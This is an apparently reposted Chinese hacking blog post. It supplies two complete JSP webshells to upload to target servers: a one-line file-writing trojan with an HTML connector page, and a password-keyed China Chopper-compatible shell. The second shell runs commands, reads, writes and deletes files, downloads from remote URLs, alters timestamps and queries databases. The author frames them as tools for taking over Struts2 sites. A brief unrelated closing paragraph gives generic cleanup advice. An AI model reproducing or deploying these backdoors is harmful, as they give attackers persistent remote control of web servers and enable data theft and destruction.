如何使用JSP一句话木马和菜刀木马

JavaScript010

如何使用JSP一句话木马和菜刀木马,第1张

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)以下是服务端,保存成one.jsp并上传至目标服务器中。<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%>通过使用一句话木马客户端连接one.jsp木马。将下列代码保存为html页面:<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.valueget.submit()" value=提交></form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%> </textarea> </div></body>保存完成后,打开html页面,写入一句话木马服务端地址,例如http://www.cto365.com/one.jsp,写入需要的代码和保存的文件名称点击保存即可。 2、中国菜刀能用的菜刀马本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com"String EC(String s,String c)throws Exception{return s}//new String(s.getBytes("ISO-8859-1"),c)}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn")Class.forName(x[0].trim()).newInstance()Connection c=DriverManager.getConnection(x[1].trim())if(x.length>2){c.setCatalog(x[2].trim())}return c}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots()for(int i=0i<r.lengthi++){sb.append(r[i].toString().substring(0,2))}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles()String sT, sQ,sF=""java.util.Date dtSimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")for(int i=0i<l.lengthi++){dt=new java.util.Date(l[i].lastModified())sT=fm.format(dt)sQ=l[i].canRead()?"R":""sQ+=l[i].canWrite()?" W":""if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n")}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n"}}sb.append(sF)}void EE(String s)throws Exception{File f=new File(s)if(f.isDirectory()){File x[]=f.listFiles()for(int k=0k<x.lengthk++){if(!x[k].delete()){EE(x[k].getPath())}}}f.delete()}void FF(String s,HttpServletResponse r)throws Exception{int nbyte[] b=new byte[512]r.reset()ServletOutputStream os=r.getOutputStream()BufferedInputStream is=new BufferedInputStream(new FileInputStream(s))os.write(("->"+"|").getBytes(),0,3)while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.write(("|"+"<-").getBytes(),0,3)os.close()is.close()}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF"int nFile f=new File(s)f.createNewFile()FileOutputStream os=new FileOutputStream(f)for(int i=0i<d.length()i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))))}os.close()}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d)if(sf.isDirectory()){if(!df.exists()){df.mkdir()}File z[]=sf.listFiles()for(int j=0j<z.lengthj++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName())}}else{FileInputStream is=new FileInputStream(sf)FileOutputStream os=new FileOutputStream(df)int nbyte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}is.close()os.close()}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d)sf.renameTo(df)}void JJ(String s)throws Exception{File f=new File(s)f.mkdir()}void KK(String s,String t)throws Exception{File f=new File(s)SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")java.util.Date dt=fm.parse(t)f.setLastModified(dt.getTime())}void LL(String s, String d)throws Exception{URL u=new URL(s)int nFileOutputStream os=new FileOutputStream(d)HttpURLConnection h=(HttpURLConnection)u.openConnection()InputStream is=h.getInputStream()byte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.close()is.close()h.disconnect()}void MM(InputStream is, StringBuffer sb)throws Exception{String lBufferedReader br=new BufferedReader(new InputStreamReader(is))while((l=br.readLine())!=null){sb.append(l+"rn")}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s)ResultSet r=c.getMetaData().getCatalogs()while(r.next()){sb.append(r.getString(1)+"t")}r.close()c.close()}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s)String[] t={"TABLE"}ResultSet r=c.getMetaData().getTables (null,null,"%",t)while(r.next()){sb.append(r.getString("TABLE_NAME")+"t")}r.close()c.close()}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn")Connection c=GC(s)Statement m=c.createStatement(1005,1007)ResultSet r=m.executeQuery("select * from "+x[3])ResultSetMetaData d=r.getMetaData()for(int i=1i<=d.getColumnCount()i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t")}r.close()m.close()c.close()}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int iConnection c=GC(s)Statement m=c.createStatement(1005,1008)try{ResultSet r=m.executeQuery(q)ResultSetMetaData d=r.getMetaData()int n=d.getColumnCount()for(i=1i<=ni++){sb.append(d.getColumnName(i)+"t|t")}sb.append("rn")while(r.next()){for(i=1i<=ni++){sb.append(EC(r.getString(i),cs)+"t|t")}sb.append("rn")}r.close()}catch(Exception e){sb.append("Resultt|trn")try{m.executeUpdate(q)sb.append("Execute Successfully!t|trn")}catch(Exception ee){sb.append(ee.toString()+"t|trn")}}m.close()c.close()}%><%String cs=request.getParameter("z0")+""request.setCharacterEncoding(cs)response.setContentType("text/htmlcharset="+cs)String Z=EC(request.getParameter(Pwd)+"",cs)String z1=EC(request.getParameter("z1")+"",cs)String z2=EC(request.getParameter("z2")+"",cs)StringBuffer sb=new StringBuffer("")try{sb.append("->"+"|")if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent()sb.append(s+"t")if(!s.substring(0,1).equals("/")){AA(sb)}}else if(Z.equals("B")){BB(z1,sb)}else if(Z.equals("C")){String l=""BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))))while((l=br.readLine())!=null){sb.append(l+"rn")}br.close()}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))))bw.write(z2)bw.close()sb.append("1")}else if(Z.equals("E")){EE(z1)sb.append("1")}else if(Z.equals("F")){FF(z1,response)}else if(Z.equals("G")){GG(z1,z2)sb.append("1")}else if(Z.equals("H")){HH(z1,z2)sb.append("1")}else if(Z.equals("I")){II(z1,z2)sb.append("1")}else if(Z.equals("J")){JJ(z1)sb.append("1")}else if(Z.equals("K")){KK(z1,z2)sb.append("1")}else if(Z.equals("L")){LL(z1,z2)sb.append("1")}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2}Process p=Runtime.getRuntime().exec(c)MM(p.getInputStream(),sb)MM(p.getErrorStream(),sb)}else if(Z.equals("N")){NN(z1,sb)}else if(Z.equals("O")){OO(z1,sb)}else if(Z.equals("P")){PP(z1,sb)}else if(Z.equals("Q")){QQ(cs,z1,z2,sb)}}catch(Exception e){sb.append("ERROR"+":// "+e.toString())}sb.append("|"+"<-")out.print(sb.toString())%>

在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉1.删除JS里的混迹加密代码,并做下JS目录的权限为只读权限。为何网站JS内容被篡改,应该是网站存在漏洞。2、 网站代码漏洞,这需要有安全意识的程序员才能修复得了,通常是在出现被挂 马以后才知道要针对哪方面入手修复;3、也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司比较专业.